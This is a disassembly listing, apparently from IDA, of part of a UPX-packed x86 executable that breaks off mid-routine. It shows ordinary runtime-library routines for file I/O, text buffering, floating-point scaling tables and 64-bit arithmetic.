align 4
; =============== S U B R O U T I N E =======================================
sub_4047FC proc near ; CODE XREF: sub_403970+DC�p
; sub_403A8C+C7�p
mov ecx, [eax]
mov [eax], edx
test edx, edx
jz short loc_40480C
push ecx
push edx
mov eax, [edx]
call dword ptr [eax+4]
pop ecx
loc_40480C: ; CODE XREF: sub_4047FC+6�j
test ecx, ecx
jz short locret_404816
push ecx
mov eax, [ecx]
call dword ptr [eax+8]
locret_404816: ; CODE XREF: sub_4047FC+12�j
retn
sub_4047FC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_404818 proc near ; CODE XREF: UPX0:004054C4�p
jmp ds:dword_40D0F0
sub_404818 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404820 proc near ; DATA XREF: UPX0:004048C3�o
xor edx, edx
mov [eax+10h], edx
mov [eax+0Ch], edx
push edx
lea edx, [eax+10h]
push edx
push dword ptr [eax+8]
push dword ptr [eax+14h]
push dword ptr [eax]
call sub_4010A0 ; ReadFile
test eax, eax
jz short loc_404841
loc_40483E: ; CODE XREF: sub_404820+29�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_404841: ; CODE XREF: sub_404820+1C�j
call sub_401108 ; RtlGetLastWin32Error
cmp eax, 6Dh
jz short loc_40483E
retn
sub_404820 endp
; =============== S U B R O U T I N E =======================================
sub_40484C proc near ; DATA XREF: UPX0:004048FA�o
; UPX0:loc_4049B9�o
xor eax, eax
retn
sub_40484C endp
; =============== S U B R O U T I N E =======================================
sub_40484F proc near ; DATA XREF: UPX0:loc_4048EC�o
; UPX0:004049F4�o
var_4 = byte ptr -4
push ecx
mov edx, [eax+0Ch]
test edx, edx
jle short loc_404871
xor ecx, ecx
mov [eax+0Ch], ecx
push ecx
lea ecx, [esp+8+var_4]
push ecx
push edx
push dword ptr [eax+14h]
push dword ptr [eax]
call sub_4010C8 ; WriteFile
test eax, eax
jz short loc_404875
loc_404871: ; CODE XREF: sub_40484F+6�j
xor eax, eax
loc_404873: ; CODE XREF: sub_40484F+2B�j
pop ecx
retn
; ---------------------------------------------------------------------------
loc_404875: ; CODE XREF: sub_40484F+20�j
call sub_401108 ; RtlGetLastWin32Error
jmp short loc_404873
sub_40484F endp
; ---------------------------------------------------------------------------
dword_40487C dd 40C730FFh, 0D7B004h, 0C7E6E800h, 7548FFFFh, 75E8C301h
; DATA XREF: UPX0:loc_4048F3�o
dd 0C3FFFFC8h
; ---------------------------------------------------------------------------
loc_404894: ; DATA XREF: sub_404A22+21�o
; UPX0:0040C068�o ...
push esi
mov esi, eax
xor eax, eax
mov [esi+0Ch], eax
mov [esi+10h], eax
mov eax, [esi+4]
sub eax, 0D7B1h
jz short loc_4048B4
dec eax
jz short loc_4048CC
dec eax
jz short loc_4048DD
jmp loc_4049FD
; ---------------------------------------------------------------------------
loc_4048B4: ; CODE XREF: UPX0:004048A7�j
mov eax, 80000000h
mov edx, 1
mov ecx, 3
mov dword ptr [esi+1Ch], offset sub_404820
jmp short loc_4048F3
; ---------------------------------------------------------------------------
loc_4048CC: ; CODE XREF: UPX0:004048AA�j
mov eax, 40000000h
mov edx, 1
mov ecx, 2
jmp short loc_4048EC
; ---------------------------------------------------------------------------
loc_4048DD: ; CODE XREF: UPX0:004048AD�j
mov eax, 0C0000000h
mov edx, 1
mov ecx, 3
loc_4048EC: ; CODE XREF: UPX0:004048DB�j
mov dword ptr [esi+1Ch], offset sub_40484F
loc_4048F3: ; CODE XREF: UPX0:004048CA�j
mov dword ptr [esi+24h], offset dword_40487C
mov dword ptr [esi+20h], offset sub_40484C
cmp byte ptr [esi+48h], 0
jz loc_4049B9
push 0
push 80h
push ecx
push 0
push edx
push eax
lea eax, [esi+48h]
push eax
call near ptr dword_401068+10h
cmp eax, 0FFFFFFFFh
jz loc_404A14
mov [esi], eax
cmp dword ptr [esi+4], 0D7B3h
jnz loc_4049DB
dec dword ptr [esi+4]
push 0
push dword ptr [esi]
call near ptr dword_401068+20h
inc eax
jz loc_404A14
sub eax, 81h
jnb short loc_404954
xor eax, eax
loc_404954: ; CODE XREF: UPX0:00404950�j
push 0
push 0
push eax
push dword ptr [esi]
call sub_4010B8 ; SetFilePointer
inc eax
jz loc_404A14
push 0
mov edx, esp
push 0
push edx
push 80h
lea edx, [esi+14Ch]
push edx
push dword ptr [esi]
call sub_4010A0 ; ReadFile
pop edx
dec eax
jnz loc_404A14
xor eax, eax
loc_40498B: ; CODE XREF: UPX0:0040499A�j
cmp eax, edx
jnb short loc_4049DB
cmp byte ptr [esi+eax+14Ch], 1Ah
jz short loc_40499C
inc eax
jmp short loc_40498B
; ---------------------------------------------------------------------------
loc_40499C: ; CODE XREF: UPX0:00404997�j
push 2
push 0
sub eax, edx
push eax
push dword ptr [esi]
call sub_4010B8 ; SetFilePointer
inc eax
jz short loc_404A14
push dword ptr [esi]
call sub_4010B0 ; SetEndOfFile
dec eax
jnz short loc_404A14
jmp short loc_4049DB
; ---------------------------------------------------------------------------
loc_4049B9: ; CODE XREF: UPX0:00404905�j
mov dword ptr [esi+24h], offset sub_40484C
cmp dword ptr [esi+4], 0D7B2h
jz short loc_4049CD
push 0FFFFFFF6h
jmp short loc_4049CF
; ---------------------------------------------------------------------------
loc_4049CD: ; CODE XREF: UPX0:004049C7�j
push 0FFFFFFF5h
loc_4049CF: ; CODE XREF: UPX0:004049CB�j
call near ptr dword_401068+28h
cmp eax, 0FFFFFFFFh
jz short loc_404A14
mov [esi], eax
loc_4049DB: ; CODE XREF: UPX0:00404932�j
; UPX0:0040498D�j ...
cmp dword ptr [esi+4], 0D7B1h
jz short loc_4049FB
push dword ptr [esi]
call near ptr dword_401068+18h
test eax, eax
jz short loc_4049FF
cmp eax, 2
jnz short loc_4049FB
mov dword ptr [esi+20h], offset sub_40484F
loc_4049FB: ; CODE XREF: UPX0:004049E2�j
; UPX0:004049F2�j
xor eax, eax
loc_4049FD: ; CODE XREF: UPX0:004048AF�j
; UPX0:00404A12�j ...
pop esi
retn
; ---------------------------------------------------------------------------
loc_4049FF: ; CODE XREF: UPX0:004049ED�j
push dword ptr [esi]
call near ptr dword_401068+8
mov dword ptr [esi+4], 0D7B0h
mov eax, 69h
jmp short loc_4049FD
; ---------------------------------------------------------------------------
loc_404A14: ; CODE XREF: UPX0:00404923�j
; UPX0:00404945�j ...
mov dword ptr [esi+4], 0D7B0h
call sub_401108 ; RtlGetLastWin32Error
jmp short loc_4049FD
; =============== S U B R O U T I N E =======================================
sub_404A22 proc near ; CODE XREF: UPX0:0040549C�p
; UPX0:004054AB�p ...
lea ecx, [eax+14Ch]
mov [eax+14h], ecx
xor ecx, ecx
mov [eax], ecx
mov dword ptr [eax+4], 0D7B0h
mov dword ptr [eax+8], 80h
mov [eax+0Ch], ecx
mov [eax+10h], ecx
mov dword ptr [eax+18h], offset loc_404894
mov [eax+1Ch], ecx
mov [eax+20h], ecx
mov [eax+24h], ecx
lea eax, [eax+48h]
test edx, edx
jz short loc_404A75
mov ch, 82h
loc_404A5C: ; CODE XREF: sub_404A22+50�j
mov cl, [edx]
inc edx
mov [eax], cl
inc eax
test cl, cl
jz short locret_404A77
mov cl, [edx]
inc edx
mov [eax], cl
inc eax
test cl, cl
jz short locret_404A77
dec ch
jnz short loc_404A5C
dec eax
loc_404A75: ; CODE XREF: sub_404A22+36�j
mov [eax], ch
locret_404A77: ; CODE XREF: sub_404A22+42�j
; sub_404A22+4C�j
retn
sub_404A22 endp
; ---------------------------------------------------------------------------
mov edx, [eax+4]
cmp edx, 0D7B2h
jnz short loc_404A8B
call dword ptr [eax+1Ch]
test eax, eax
jnz short loc_404A98
locret_404A8A: ; CODE XREF: UPX0:00404A91�j
retn
; ---------------------------------------------------------------------------
loc_404A8B: ; CODE XREF: UPX0:00404A81�j
cmp edx, 0D7B1h
jz short locret_404A8A
mov eax, 67h
loc_404A98: ; CODE XREF: UPX0:00404A88�j
jmp sub_402638
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_404D83
loc_404A9D: ; CODE XREF: sub_404D83+F�j
mov edx, [eax+4]
cmp edx, 0D7B2h
jnz short loc_404AB0
call dword ptr [eax+20h]
test eax, eax
jnz short loc_404ABD
locret_404AAF: ; CODE XREF: sub_404D83-2CD�j
retn
; ---------------------------------------------------------------------------
loc_404AB0: ; CODE XREF: sub_404D83-2DD�j
cmp edx, 0D7B1h
jz short locret_404AAF
mov eax, 67h
loc_404ABD: ; CODE XREF: sub_404D83-2D6�j
jmp sub_402638
; END OF FUNCTION CHUNK FOR sub_404D83
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_404AC4 proc near ; CODE XREF: sub_404C68+16�p
; UPX0:004053AA�p ...
push ebx
mov ebx, eax
mov edx, [eax+4]
sub edx, 0D7B1h
jz short loc_404AE0
cmp edx, 2
ja short loc_404AF0
call dword ptr [eax+1Ch]
test eax, eax
jnz short loc_404AE9
mov eax, ebx
loc_404AE0: ; CODE XREF: sub_404AC4+C�j
call dword ptr [ebx+24h]
test eax, eax
jnz short loc_404AE9
loc_404AE7: ; CODE XREF: sub_404AC4+2A�j
; sub_404AC4+31�j
pop ebx
retn
; ---------------------------------------------------------------------------
loc_404AE9: ; CODE XREF: sub_404AC4+18�j
; sub_404AC4+21�j ...
call sub_402638
jmp short loc_404AE7
; ---------------------------------------------------------------------------
loc_404AF0: ; CODE XREF: sub_404AC4+11�j
cmp eax, offset dword_40C050
jz short loc_404AE7
mov eax, 67h
jmp short loc_404AE9
sub_404AC4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404B00 proc near ; CODE XREF: sub_40A5A0+14A�p
cmp dword ptr [eax+4], 0D7B1h
jnz short loc_404B21
mov edx, [eax+0Ch]
cmp edx, [eax+10h]
jnb short loc_404B21
add edx, [eax+14h]
mov al, 0
mov cl, [edx]
cmp cl, 1Ah
jz short loc_404B1E
retn
; ---------------------------------------------------------------------------
loc_404B1E: ; CODE XREF: sub_404B00+1B�j
; sub_404B00+2A�j
mov al, 1
retn
; ---------------------------------------------------------------------------
loc_404B21: ; CODE XREF: sub_404B00+7�j
; sub_404B00+F�j
push eax
call sub_404B34
pop edx
cmp al, 1Ah
jz short loc_404B1E
dec dword ptr [edx+0Ch]
mov al, 0
retn
sub_404B00 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_404B34 proc near ; CODE XREF: sub_404B00+22�p
; sub_404BBF+49�p ...
cmp dword ptr [eax+4], 0D7B1h
jnz short loc_404B57
loc_404B3D: ; CODE XREF: sub_404B34+48�j
mov edx, [eax+0Ch]
cmp edx, [eax+10h]
jnb short loc_404B80
loc_404B45: ; CODE XREF: sub_404B34+5B�j
mov ecx, [eax+14h]
mov cl, [ecx+edx]
cmp cl, 1Ah
jz short loc_404B54
inc edx
mov [eax+0Ch], edx
loc_404B54: ; CODE XREF: sub_404B34+1A�j
mov al, cl
retn
; ---------------------------------------------------------------------------
loc_404B57: ; CODE XREF: sub_404B34+7�j
cmp eax, offset dword_40C050
jz short loc_404B6B
loc_404B5E: ; CODE XREF: sub_404B34+4A�j
mov eax, 68h
call sub_402638
mov al, 1Ah
retn
; ---------------------------------------------------------------------------
loc_404B6B: ; CODE XREF: sub_404B34+28�j
call sub_404CA3
mov eax, offset dword_40C050
cmp dword ptr [eax+4], 0D7B1h
jz short loc_404B3D
jmp short loc_404B5E
; ---------------------------------------------------------------------------
loc_404B80: ; CODE XREF: sub_404B34+F�j
push eax
call dword ptr [eax+1Ch]
test eax, eax
jnz short loc_404B9E
pop eax
mov edx, [eax+0Ch]
cmp edx, [eax+10h]
jb short loc_404B45
mov ecx, [eax+14h]
mov byte ptr [ecx+edx], 1Ah
inc dword ptr [eax+10h]
mov al, 1Ah
retn
; ---------------------------------------------------------------------------
loc_404B9E: ; CODE XREF: sub_404B34+52�j
call sub_402638
pop eax
mov al, 1Ah
retn
sub_404B34 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_404BA8 proc near ; CODE XREF: sub_4036B0+1C�p
; sub_4036B0+39�p
push edx
inc edx
call sub_404BBF
pop edx
mov [edx], cl
retn
sub_404BA8 endp
; ---------------------------------------------------------------------------
push edx
call sub_404BBF
pop edx
mov byte ptr [edx+ecx], 0
retn
; =============== S U B R O U T I N E =======================================
sub_404BBF proc near ; CODE XREF: sub_404BA8+2�p
; UPX0:00404BB4�p
push ebx
push esi
push edi
push ecx
mov ebx, eax
mov esi, ecx
mov edi, edx
cmp dword ptr [ebx+4], 0D7B1h
jnz short loc_404C1A
loc_404BD2: ; CODE XREF: sub_404BBF+7A�j
test esi, esi
jle short loc_404BFC
mov edx, [ebx+0Ch]
mov ecx, [ebx+10h]
sub ecx, edx
add edx, [ebx+14h]
loc_404BE1: ; CODE XREF: sub_404BBF+32�j
dec ecx
jl short loc_404C03
mov al, [edx]
inc edx
loc_404BE7: ; CODE XREF: sub_404BBF+59�j
cmp al, 1Ah
jz short loc_404BFC
cmp al, 0Dh
jz short loc_404BF5
stosb
dec esi
jg short loc_404BE1
jmp short loc_404BF6
; ---------------------------------------------------------------------------
loc_404BF5: ; CODE XREF: sub_404BBF+2E�j
dec edx
loc_404BF6: ; CODE XREF: sub_404BBF+34�j
sub edx, [ebx+14h]
mov [ebx+0Ch], edx
loc_404BFC: ; CODE XREF: sub_404BBF+15�j
; sub_404BBF+2A�j ...
pop ecx
sub ecx, esi
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_404C03: ; CODE XREF: sub_404BBF+23�j
mov [ebx+0Ch], edx
mov eax, ebx
call sub_404B34
mov edx, [ebx+0Ch]
mov ecx, [ebx+10h]
sub ecx, edx
add edx, [ebx+14h]
jmp short loc_404BE7
; ---------------------------------------------------------------------------
loc_404C1A: ; CODE XREF: sub_404BBF+11�j
cmp eax, offset dword_40C050
jz short loc_404C2D
loc_404C21: ; CODE XREF: sub_404BBF+7C�j
mov eax, 68h
call sub_402638
jmp short loc_404BFC
; ---------------------------------------------------------------------------
loc_404C2D: ; CODE XREF: sub_404BBF+60�j
call sub_404CA3
cmp dword ptr [ebx+4], 0D7B1h
jz short loc_404BD2
jmp short loc_404C21
sub_404BBF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404C40 proc near ; CODE XREF: sub_40A5A0+D1�p
push ebx
mov ebx, eax
loc_404C43: ; CODE XREF: sub_404C40+10�j
mov eax, ebx
call sub_404B34
cmp al, 1Ah
jz short loc_404C66
cmp al, 0Dh
jnz short loc_404C43
mov eax, ebx
call sub_404B34
cmp al, 0Ah
jz short loc_404C64
cmp al, 1Ah
jz short loc_404C66
dec dword ptr [ebx+0Ch]
loc_404C64: ; CODE XREF: sub_404C40+1B�j
pop ebx
retn
; ---------------------------------------------------------------------------
loc_404C66: ; CODE XREF: sub_404C40+C�j
; sub_404C40+1F�j
pop ebx
retn
sub_404C40 endp
; =============== S U B R O U T I N E =======================================
sub_404C68 proc near ; CODE XREF: sub_404CA3+5�j
; sub_404CAA+5�j ...
push ebx
push esi
mov esi, eax
mov ebx, edx
mov edx, [esi+4]
sub edx, 0D7B0h
jz short loc_404C83
cmp edx, 3
ja short loc_404C97
call sub_404AC4
loc_404C83: ; CODE XREF: sub_404C68+F�j
mov eax, esi
mov [esi+4], ebx
call dword ptr [esi+18h]
test eax, eax
jz short loc_404C94
call sub_402638
loc_404C94: ; CODE XREF: sub_404C68+25�j
; sub_404C68+39�j
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_404C97: ; CODE XREF: sub_404C68+14�j
mov eax, 66h
call sub_402638
jmp short loc_404C94
sub_404C68 endp
; =============== S U B R O U T I N E =======================================
sub_404CA3 proc near ; CODE XREF: sub_404B34:loc_404B6B�p
; sub_404BBF:loc_404C2D�p ...
mov edx, 0D7B1h
jmp short sub_404C68
sub_404CA3 endp
; =============== S U B R O U T I N E =======================================
sub_404CAA proc near ; CODE XREF: sub_404CB8+45�p
; UPX0:00404DC7�p ...
mov edx, 0D7B2h
jmp short sub_404C68
sub_404CAA endp
; ---------------------------------------------------------------------------
mov edx, 0D7B3h
jmp short sub_404C68
; =============== S U B R O U T I N E =======================================
sub_404CB8 proc near ; CODE XREF: sub_403688+22�j
; sub_404D23+16�p ...
push esi
push edi
mov esi, edx
cmp dword ptr [eax+4], 0D7B2h
jnz short loc_404CF3
loc_404CC5: ; CODE XREF: sub_404CB8+31�j
; sub_404CB8+54�j
mov edi, [eax+14h]
add edi, [eax+0Ch]
mov edx, [eax+8]
sub edx, [eax+0Ch]
cmp edx, ecx
jg short loc_404CEB
add [eax+0Ch], edx
sub ecx, edx
push eax
push ecx
mov ecx, edx
rep movsb
call dword ptr [eax+1Ch]
test eax, eax
jnz short loc_404D1A
pop ecx
pop eax
jmp short loc_404CC5
; ---------------------------------------------------------------------------
loc_404CEB: ; CODE XREF: sub_404CB8+1B�j
add [eax+0Ch], ecx
rep movsb
loc_404CF0: ; CODE XREF: sub_404CB8+60�j
; sub_404CB8+69�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_404CF3: ; CODE XREF: sub_404CB8+B�j
cmp eax, offset dword_40C21C
jnz short loc_404D0E
push ecx
push edx
push eax
call sub_404CAA
pop eax
pop edx
pop ecx
cmp dword ptr [eax+4], 0D7B2h
jz short loc_404CC5
loc_404D0E: ; CODE XREF: sub_404CB8+40�j
mov eax, 69h
call sub_402638
jmp short loc_404CF0
; ---------------------------------------------------------------------------
loc_404D1A: ; CODE XREF: sub_404CB8+2D�j
call sub_402638
pop ecx
pop eax
jmp short loc_404CF0
sub_404CB8 endp
; =============== S U B R O U T I N E =======================================
sub_404D23 proc near ; CODE XREF: sub_403688+19�p
; UPX0:00404D73�p ...
mov ecx, edx
loc_404D25: ; CODE XREF: sub_404D23+2B�j
mov edx, offset asc_40B064 ; " "...
cmp ecx, 40h
jle short loc_404D50
sub ecx, 40h
push eax
push ecx
mov ecx, 40h
call sub_404CB8
call sub_405564
cmp dword ptr [eax+4], 0
jnz short loc_404D59
pop ecx
pop eax
jmp short loc_404D25
; ---------------------------------------------------------------------------
loc_404D50: ; CODE XREF: sub_404D23+A�j
test ecx, ecx
jg sub_404CB8
retn
; ---------------------------------------------------------------------------
loc_404D59: ; CODE XREF: sub_404D23+27�j
pop ecx
pop eax
retn
sub_404D23 endp
; ---------------------------------------------------------------------------
xor ecx, ecx
mov cl, [edx]
inc edx
jmp sub_404CB8
; ---------------------------------------------------------------------------
push ebx
xor ebx, ebx
mov bl, [edx]
sub ecx, ebx
jle short loc_404D7A
push eax
push edx
mov edx, ecx
call sub_404D23
pop edx
pop eax
loc_404D7A: ; CODE XREF: UPX0:00404D6D�j
mov ecx, ebx
pop ebx
inc edx
jmp sub_404CB8
; =============== S U B R O U T I N E =======================================
sub_404D83 proc near ; CODE XREF: sub_403090+55�p
; sub_40788C+2C�p ...
; FUNCTION CHUNK AT 00404A9D SIZE 00000025 BYTES
mov edx, (offset asc_40B064+40h)
mov ecx, 2
call sub_404CB8
jmp loc_404A9D
sub_404D83 endp
; ---------------------------------------------------------------------------
cmp dword ptr [eax+4], 0D7B2h
jnz short loc_404DBE
loc_404DA0: ; CODE XREF: UPX0:00404DBC�j
; UPX0:00404DD5�j
mov ecx, [eax+0Ch]
cmp ecx, [eax+8]
jge short loc_404DB1
add ecx, [eax+14h]
mov [ecx], dl
inc dword ptr [eax+0Ch]
retn
; ---------------------------------------------------------------------------
loc_404DB1: ; CODE XREF: UPX0:00404DA6�j
push eax
push edx
call dword ptr [eax+1Ch]
test eax, eax
jnz short loc_404DE1
pop edx
pop eax
jmp short loc_404DA0
; ---------------------------------------------------------------------------
loc_404DBE: ; CODE XREF: UPX0:00404D9E�j
cmp eax, offset dword_40C21C
jnz short loc_404DD7
push edx
push eax
call sub_404CAA
pop eax
pop edx
cmp dword ptr [eax+4], 0D7B2h
jz short loc_404DA0
loc_404DD7: ; CODE XREF: UPX0:00404DC3�j
mov eax, 69h
jmp sub_402638
; ---------------------------------------------------------------------------
loc_404DE1: ; CODE XREF: UPX0:00404DB8�j
call sub_402638
pop edx
pop eax
retn
; ---------------------------------------------------------------------------
push edx
lea edx, [ecx-1]
call sub_404D23
mov edx, esp
mov ecx, 1
call sub_404CB8
pop edx
retn
; =============== S U B R O U T I N E =======================================
sub_404E00 proc near ; CODE XREF: sub_403090+50�p
; sub_40788C+27�p
xor ecx, ecx
jmp short $+2
push esi
push edi
mov esi, eax
push ecx
mov edi, edx
or ecx, 0FFFFFFFFh
mov al, 0
repne scasb
not ecx
dec ecx
mov edi, edx
pop edx
sub edx, ecx
mov eax, esi
push ecx
call sub_404D23
pop ecx
mov eax, esi
mov edx, edi
pop edi
pop esi
jmp sub_404CB8
sub_404E00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_404E30 proc near ; CODE XREF: sub_4090A0+54�p
; UPX0:loc_4092ED�p
test eax, eax
jl short loc_404E7C
jz short locret_404E7B
cmp eax, 1400h
jge loc_404EC0
mov edx, eax
and edx, 1Fh
lea edx, [edx+edx*4]
fld tbyte_404ED4[edx*2]
fmulp st(1), st
shr eax, 5
jz short locret_404E7B
mov edx, eax
and edx, 0Fh
jz short loc_404E6A
lea edx, [edx+edx*4]
fld tbyte_40500A[edx*2]
fmulp st(1), st
loc_404E6A: ; CODE XREF: sub_404E30+2C�j
shr eax, 4
jz short locret_404E7B
lea eax, [eax+eax*4]
fld tbyte_4050A0[eax*2]
fmulp st(1), st
locret_404E7B: ; CODE XREF: sub_404E30+4�j
; sub_404E30+25�j ...
retn
; ---------------------------------------------------------------------------
loc_404E7C: ; CODE XREF: sub_404E30+2�j
neg eax
cmp eax, 1400h
jge short loc_404EC7
mov edx, eax
and edx, 1Fh
lea edx, [edx+edx*4]
fld tbyte_404ED4[edx*2]
fdivp st(1), st
shr eax, 5
jz short locret_404E7B
mov edx, eax
and edx, 0Fh
jz short loc_404EAE
lea edx, [edx+edx*4]
fld tbyte_40500A[edx*2]
fdivp st(1), st
loc_404EAE: ; CODE XREF: sub_404E30+70�j
shr eax, 4
jz short locret_404E7B
lea eax, [eax+eax*4]
fld tbyte_4050A0[eax*2]
fdivp st(1), st
retn
; ---------------------------------------------------------------------------
loc_404EC0: ; CODE XREF: sub_404E30+B�j
fld tbyte_404ECA
retn
; ---------------------------------------------------------------------------
loc_404EC7: ; CODE XREF: sub_404E30+53�j
fldz
retn
sub_404E30 endp
; ---------------------------------------------------------------------------
tbyte_404ECA dt 1.1897314953572317651e4932 ; DATA XREF: sub_404E30:loc_404EC0�r
tbyte_404ED4 dt 1.0 ; DATA XREF: sub_404E30+19�r
; sub_404E30+5D�r
align 10h
dd 0
dd 4002A000h, 0
dd 0C8000000h, 4005h, 0
dd 4008FA00h, 0
dd 9C400000h, 400Ch, 0
; ---------------------------------------------------------------------------
push eax
retn
; ---------------------------------------------------------------------------
dw 400Fh
dd 0
dd 0F4240000h, 4012h, 80000000h, 40169896h, 0
dd 0BEBC2000h, 4019h, 28000000h, 401CEE6Bh, 0
dd 9502F900h, 4020h, 0B7400000h, 4023BA43h, 0
dd 0E8D4A510h, 4026h, 0E72A0000h, 402A9184h, 80000000h
dd 0B5E620F4h, 402Dh, 0A931A000h, 4030E35Fh, 4000000h
dd 8E1BC9BFh, 4034h, 0BC2EC500h, 4037B1A2h, 76400000h
dd 0DE0B6B3Ah, 403Ah, 230489E8h, 403E8AC7h, 0AC620000h
dd 0AD78EBC5h, 80004041h, 26B7177Ah, 4044D8D7h, 6EAC9000h
dd 87867832h, 0B4004048h, 163F0A57h, 404BA968h, 0CCEDA100h
dd 0D3C21BCEh, 84A0404Eh, 51614014h, 40528459h, 9019A5C8h
dd 0A56FA5B9h, 0F3A4055h, 8F27F420h, 4058CECBh, 0F8940984h
dd 813F3978h, 0BE5405Ch, 7D736B9h, 405FA18Fh, 4674EDFh
dd 0C9F2C9CDh
db 62h, 40h
tbyte_40500A dt 9.9999999999999999998e30 ; DATA XREF: sub_404E30+31�r
; sub_404E30+75�r
dd 2B70B59Eh, 9DC5ADA8h, 0A6D54069h, 1F49FFCFh, 40D3C278h
dd 0C59B14A3h, 0EFB3AB16h, 8CE0413Dh, 47C980E9h, 41A893BAh
dd 7FE617AAh, 0B616A12Bh, 556B4212h, 0F78D3927h, 427CE070h
dd 0E33CC930h, 8A5296FFh, 0DE8E42E7h, 0EBFB9DF9h, 4351AA7Eh
dd 5C6A2F8Ch, 0D226FC19h, 0E37643BBh, 2F29F2CCh, 44268184h
dd 0DB900AD2h, 9FA42700h, 0AA174490h, 0E310AEF8h, 44FAC4C5h
dd 0E9B09C59h, 0F28A9C07h, 0F3D44564h, 4AE1EBF7h, 45CF957Ah
tbyte_4050A0 dt 9.9999999999999999996e479 ; DATA XREF: sub_404E30+42�r
; sub_404E30+86�r
dw 91C7h
dd 0A0AEA60Eh, 46A3E319h, 81750C17h, 0C9767586h, 0A7E44D48h
dd 353B3993h, 53EDB2B8h, 0C53D5DE5h, 9E8B3B5Dh, 0F0A65A92h
dd 54C020A1h, 61378CA5h, 0D88B5A8Bh, 0F9895D25h, 0F3F867DBh
dd 0C8A2BF27h, 6E80DD5Dh, 8A20979Bh, 0C4605202h, 59F07525h
dd 11626ED5h, 7BCAAE35h
; =============== S U B R O U T I N E =======================================
sub_405104 proc near ; CODE XREF: sub_406754+43�p
; sub_406754+5D�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edx
push eax
mov eax, [esp+8+arg_4]
mul [esp+8+var_8]
mov ecx, eax
mov eax, [esp+8+var_4]
mul [esp+8+arg_0]
add ecx, eax
mov eax, [esp+8+var_8]
mul [esp+8+arg_0]
add edx, ecx
pop ecx
pop ecx
retn 8
sub_405104 endp
; ---------------------------------------------------------------------------
push edx
push eax
mov eax, [esp+10h]
mul dword ptr [esp]
mov ecx, eax
mov eax, [esp+4]
mul dword ptr [esp+0Ch]
add ecx, eax
mov eax, [esp]
mul dword ptr [esp+0Ch]
add edx, ecx
pop ecx
pop ecx
retn 8
; =============== S U B R O U T I N E =======================================
sub_40514A proc near ; CODE XREF: UPX0:004051EA�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebp
push ebx
push esi
push edi
xor edi, edi
mov ebx, [esp+10h+arg_0]
mov ecx, [esp+10h+arg_4]
or ecx, ecx
jnz short loc_405164
or edx, edx
jz short loc_4051BC
or ebx, ebx
jz short loc_4051BC
loc_405164: ; CODE XREF: sub_40514A+10�j
or edx, edx
jns short loc_405172
neg edx
neg eax
sbb edx, 0
or edi, 1
loc_405172: ; CODE XREF: sub_40514A+1C�j
or ecx, ecx
jns short loc_405180
neg ecx
neg ebx
sbb ecx, 0
xor edi, 1
loc_405180: ; CODE XREF: sub_40514A+2A�j
mov ebp, ecx
mov ecx, 40h
push edi
xor edi, edi
xor esi, esi
loc_40518C: ; CODE XREF: sub_40514A:loc_4051A3�j
shl eax, 1
rcl edx, 1
rcl esi, 1
rcl edi, 1
cmp edi, ebp
jb short loc_4051A3
ja short loc_40519E
cmp esi, ebx
jb short loc_4051A3
loc_40519E: ; CODE XREF: sub_40514A+4E�j
sub esi, ebx
sbb edi, ebp
inc eax
loc_4051A3: ; CODE XREF: sub_40514A+4C�j
; sub_40514A+52�j
loop loc_40518C
pop ebx
test ebx, 1
jz short loc_4051B5
neg edx
neg eax
sbb edx, 0
loc_4051B5: ; CODE XREF: sub_40514A+62�j
; sub_40514A+76�j
pop edi
pop esi
pop ebx
pop ebp
retn 8
; ---------------------------------------------------------------------------
loc_4051BC: ; CODE XREF: sub_40514A+14�j
; sub_40514A+18�j
div ebx
xor edx, edx
jmp short loc_4051B5
sub_40514A endp
; ---------------------------------------------------------------------------
push esi
mov esi, [esp+0Ch]
and esi, [esp+8]
cmp esi, 0FFFFFFFFh
jnz short loc_4051E1
mov esi, eax
or esi, edx
cmp esi, 80000000h
jnz short loc_4051E1
mov eax, esi
pop esi
dec eax
retn
; ---------------------------------------------------------------------------
loc_4051E1: ; CODE XREF: UPX0:004051CE�j
; UPX0:004051DA�j
pop esi
push dword ptr [esp+8]
push dword ptr [esp+8]
call sub_40514A
and eax, eax
retn 8
; =============== S U B R O U T I N E =======================================
sub_4051F4 proc near ; CODE XREF: sub_406B87+2F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebp
push ebx
push esi
push edi
mov ebx, [esp+10h+arg_0]
mov ecx, [esp+10h+arg_4]
or ecx, ecx
jnz short loc_40520C
or edx, edx
jz short loc_405237
or ebx, ebx
jz short loc_405237
loc_40520C: ; CODE XREF: sub_4051F4+E�j
mov ebp, ecx
mov ecx, 40h
xor edi, edi
xor esi, esi
loc_405217: ; CODE XREF: sub_4051F4:loc_40522E�j
shl eax, 1
rcl edx, 1
rcl esi, 1
rcl edi, 1
cmp edi, ebp
jb short loc_40522E
ja short loc_405229
cmp esi, ebx
jb short loc_40522E
loc_405229: ; CODE XREF: sub_4051F4+2F�j
sub esi, ebx
sbb edi, ebp
inc eax
loc_40522E: ; CODE XREF: sub_4051F4+2D�j
; sub_4051F4+33�j
loop loc_405217
loc_405230: ; CODE XREF: sub_4051F4+47�j
pop edi
pop esi
pop ebx
pop ebp
retn 8
; ---------------------------------------------------------------------------
loc_405237: ; CODE XREF: sub_4051F4+12�j
; sub_4051F4+16�j
div ebx
xor edx, edx
jmp short loc_405230
sub_4051F4 endp
; =============== S U B R O U T I N E =======================================
sub_40523D proc near ; CODE XREF: UPX0:004052DF�p
arg_0 = dword ptr 4
